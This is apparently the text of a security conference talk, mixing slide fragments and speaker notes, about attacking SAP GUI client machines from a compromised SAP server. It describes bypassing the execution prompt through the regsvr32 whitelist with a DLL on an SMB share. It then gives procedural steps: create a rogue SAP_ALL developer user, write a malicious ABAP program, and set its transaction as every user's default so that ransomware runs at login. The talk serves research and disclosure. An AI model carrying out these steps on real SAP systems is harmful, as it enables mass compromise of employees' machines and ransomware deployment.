In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
3. How to get admin privilages in SAP?
Over 500+ companies has vulnerable CTC servlet (RCE, 2011 year)
***
3 Java serialization exploits (RCE without authorization 2015)
Information disclosure + SQL injection + CryptoIssue + MissConfig = RCE (Blackhat 2016)
DoS + DoS + RaceCondition + AuthBypass = RCE (Troopers 2016)
Anon Directory Traversal + Escalation Privileges = RCE ( we waiting to fix)
4. Minimum impact
To compromise SAP need to find some vulnerability or their chain of vulnerability to read
SecStore.properties and SecStore.key to obtain administrator user with SAP_ALL privilages
To elevate privileges and gain access to the system from SAP user or root
11. SAP GUI
motivation
11
Goal: attack SAP users from compromised SAP server
While executing transaction “DBACockpit” to manage database SAP GUI we noticed
that SAP GUI offers to open the database management program
After clicking on the web browser button, SAP GUI launched the IE browser and
opened the URL without any security notification .
Interesting! Maybe we can start any program on the client’s
computer…
16. We had 4 ways
How to disable security prompt
Open some URL with
vulnerable/malicious
ActiveX using IE
Analyze sapfesec.dll
which uses SAP GUI to
draw prompt
Search vulnerability in
whitelist EXE files
35. SAP JAVA GUI 35
• Works great on SAP GUI
• What about SAP JAVA GUI?
36. SAP JAVA GUI
Trust levels
36
• When a client connects to the server for the first time a trust level for the SAP server
should be defined
37. SAP JAVA GUI
Trust levels
37
• Productive
• We can execute any program on a client’s computer without user interaction
• Untrusted
• We can’t execute a program on a client’s computer
• BUT it is possible to connect a user to another SAP server
39. SAP JAVA GUI
RCE
39
• Productive
• just execute any program via WS_EXECUTE
• Untrusted
• connect user on productive system
• execute any program via WS_EXECUTE
44. One type of malware
Most popular ransomwares - CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom start $150 to $2.000 (Cryptomix)
ransomware
Here is our agenda for today.
We’ll start with a brief review on the most common and critical vulnerabilities in SAP. These vulnerabilities give an opportunity to access and compromise critical business data.
Then we’ll watch a clip about the string of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly attacker can do when they find and exploit SAP vulnerabilities.
In addition, we'll reveal our reasons to conduct this research and watch a clip about exploitation of this vulnerability.
And we have a bonus video for you.
Now, let us analyze the vulnerabilities we’ve managed to find.
One of the most critical vulnerabilities, which Remote Code execution, was detected in 2011. It allows any unauthorized user to easily execute an OS command via web browser. Although the vulnerability had been detected 6 years ago, it was successfully used by some Asian hackers in 2016. Till the present day the Internet is scanned for the given vulnerability.
It’s also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found out that the number of companies, which hadn’t fixed it, exceeds 500.
To obtain critical information from SAP, attackers/pentesters, it is necessary for them to find a vulnerability in SAP which would give the contents of the file sector. Administrator password scheme (with a password) to access the SAP database is stored in these files. But then I got access application administrator SAP, find and remember exploited vulnerability in another component which will give the system access to SAP.
Now it’s time to have a look at a common work scheme of SAP. With help of SAP GUI users connect to SAP server and do their work.
Let’s consider a situation when an attacker obtains information about SAP, exploits a vulnerability, e.g. in sap gateway or sap disp+work, and accessed SAP database.
While pentesting, we finished at accessing SAP database stage, but today we suggest to go further.
Here is a demo from the previous Troopers conference
So, why did we decide to make this research? It’s no secret that there are a lot transactions, functions and applications, which allows managing and monitoring system, and viewing logs, in SAP.
Once again, we executed the dbacookipit transaction and saw this important database management functionality.
SAP GUI requested a path to open database management program from us. When we want to start with web browser button, SAP GUI without any security notification launched the IE browser and opened the URL. So, we decided to create a special ABAP program with use we can execute any program on target computers. When the research was finished we detected the simplest and the most common wat to start programs on a client’s computer, which is WS_EXECUTE function.
However, when we tried launching calculator with help of ws_exewcute we got a warning message “Do you allow SAP GUI to start calc on your computer?”
It is not what we actually wanted to do. So, the next question is: “How to bypass this message?”
We thought, “It’s worth searching in google. Perhaps, there was someone, who has found out how to turn the message off.” Yeap, there was. Actually we found a whole bunch of forum replies about disabling the message by changing Windows register. However, none of them was suitable for us, because we just couldn’t change register keys remotely. Moreover, the solution wasn’t applicable to newer SAP GUI versions.
Still, there was 4 other ways to solve the problem.
To open a special Url, which will use vulnerable ActiveX, in IЕxplorer
To analyse how sap gui makes a nagscreen with help of sapfesec.dll.
Find a vulnerability in whitelist (we’ll speak about this option a bit later)
And the 4th one…well, one doesn’t even want to consider it…:D
However, on the first stage of researching ActiveX method dropped out. So, we proceeded with the 2nd one.
As it was mentioned before, SAP Security prompt is rendered in the sapfesec.dll file. Analyzing this file we learnt that, if applications stored in SAP GUI directory with certain names, SAP Security prompt won’t appear. Thus, we went on researching with this method.
Mhmm…have you noticed that there is Regsvr32 – file – read,write,execute record in whitelist.
I.e. if this file is called from OS Windows, SAP GUI will show no alerts and a file will be executed. Nonetheless, regsvr32 is an OS Windows file, which is required for a stable operating of system, as well as installing and managing dll-files.
Regsvr32 is launched with predefined arguments, with path to a dll file as a mandatory one. A common dll responsible for launching calc looks this way:
***It should be checked which of these functions will be first to finish its work.
It appears that a software written on ABAP and responsible for arbitrarz code processing on a target system will have the following form. Here smb_share is a public data storage, where our dll. With a malicious code will be put into.
Let's consider a hypothetic situation: what would happen if an attacker found the vulnerability.
For starters, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction su01 and copy a user, for example, create a new user with SAP_ALL rights under login EVIL_DEV.
Then, login as the EVIL_DEV user, run transaction se38 and create a program sap_malware_prog.
If a user with developer rights is a new one, the developer key will be needed, which is not a challenge for an attacker.
No comment
Then when we are able to create a program, we click the Insert button, then copy a program, which executes malicious functionality, then save all and activate the program.
The program is created, now we need to create a custom transaction which will launch very malware. For example, we call the transaction MLAUNCHER.
Tie a transaction to a malicious mlauncher functions sap_malware_prog and save it.
However, you can go a step further and set a default transaction. When a user is logged in, transaction mlauncher will start and a machine will run malicious code.
The screenshot shows that we set start transaction – mlauncher for all users.
And then, if you log in an the user in the SAP system, then right after the entrance it will process mlaucher transaction and, for example, launches a calculator.
Тут демо видео.
How can information theft from users' computers harm, say, the company with 1000 users?! Of course by using ransomware.
Protection against ransomware is difficult. Attack ransomware of service is growing more popular since the end 2016.
1. If you are infected, then infect a friend or friends, and you will be unlocked
2. If you want to earn money – spread ransomware and get money
Ransomware is becoming more and more popular, the number of infected user machines is becoming increasing.